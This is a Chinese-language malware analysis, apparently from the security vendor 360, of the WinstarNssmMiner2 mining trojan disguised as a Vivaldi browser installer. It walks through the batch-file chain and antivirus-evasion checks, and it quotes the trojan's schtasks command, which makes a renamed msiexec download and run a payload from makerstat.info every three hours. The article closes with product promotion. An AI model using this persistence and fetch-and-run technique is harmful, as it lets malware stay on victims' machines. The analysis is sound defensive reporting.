暴力挖矿的木马病毒又来了！

时隔一个月，360安全中心又一次监测到之前暴力挖矿的WinstarNssmMiner状态活跃，近两日的拦截量已超过20万，安全研究员把此次的木马称为WinstarNssmMiner2。此次挖矿木马的特点是会伪装成vivaldi浏览器等各种常用软件的安装包，以此骗取用户下载，由于此种作案手法很难被用户识破，安全研究员建议用户在有下载软件需求时尽量去官网，或者360软件管家下载，以保证电脑的安全。

木马分析

以vivaldi浏览器为例，伪装成该浏览器安装包的木马病毒使用了MSI安装包制作软件，而病毒制作者可以利用此软件的下载文件执行功能，在下载挖矿木马到电脑上时绕过杀毒软件的拦截。解压伪装的vivaldi浏览器安装包后会看到其包含了多个批处理文件，加密了的Zip格式文件，和解压Zip文件的工具unzip。

图一：安装包内文件

木马启动后，首先会运行安装包中的u.bat文件调用unzip文件解压缩包，解压密码为x12，解压出nircmd程序。

图二：调用unzip文件解压

接着执行c.bat，此程序的作用是判断用户电脑是否安装了Kaspersky、ESET和DrWeb杀毒软件，如果检测出已安装，那么会结束安装包msiexec.exe进程删除木马文件，病毒自杀。

图三：如果电脑安装Kaspersky、ESET、DrWeb则病毒自杀

如果执行c.bat后没有发现以上三种杀毒软件，则会接着执行nir.bat调用nircmd程序启动i.bat

图四：执行nir.bat调用nircmd

该程序可解决管理员权限启动问题，通过启动i.bat来添加一个计划任务启动项，木马拷贝系统msiexec.exe文件到随机文件名，然后将makerstat.info的域名随机与一个可执行程序（.exe）的后缀拼接生成URL，组成计划任务内容，然后利用安装包制作软件MSI自身的文件下载执行功能绕过杀毒软件的拦截。

图五：生成计划任务内容

此次解析木马设备的执行命令为：

schtasks /create /tn "TEST-xxx" /tr "'C:\WINDOWS\System32\3164326753.exe' /i http://makerstat.info/26753.rar /q" /sc minute /mo 180 /rl highest /f

其中3164326753.exe 实际上就是msiexec.exe文件。创建的计划内容如下图所示：

图六：已生成的计划任务内容

URL地址目前无法访问，木马的主要作用就是创建一个暂时看起来无效的启动项，做随时可以下发新木马的渠道，一旦木马作者将线上URL设置成木马，机器每隔3个小时就会去请求木马执行。而该MSI木马实际上是我们之前分析的WinstarNssmMiner挖矿木马。在为挖矿执行一系列操作之后，此安装包才会在用户电脑上安装vivaldi浏览器。对于此种挖矿木马，目前只有包括360安全管家在内的为数不多的安全软件可以检出

图七：可检出WinstarNssmMiner2挖矿木马的杀毒软件

安全提醒

近期国内挖矿木马非常活跃，让人防不胜防。建议用户及时为系统和第三方软件打上补丁,发现电脑卡慢等异常情况时候使用安全软件扫描，同时注意保证安全软件的时常开启以进行防御，一旦受诱导而不慎中招，可尽快使用360安全卫士查杀清除木马。

此外，360安全卫士已经推出了挖矿木马防护功能，全面防御从各种渠道入侵的挖矿木马。用户开启了该功能后，360安全卫士将会实时拦截各类挖矿木马的攻击，为用户计算机安全保驾护航。

为电脑装备防护衣可点击>>> http://urlqh.cn/m5rYE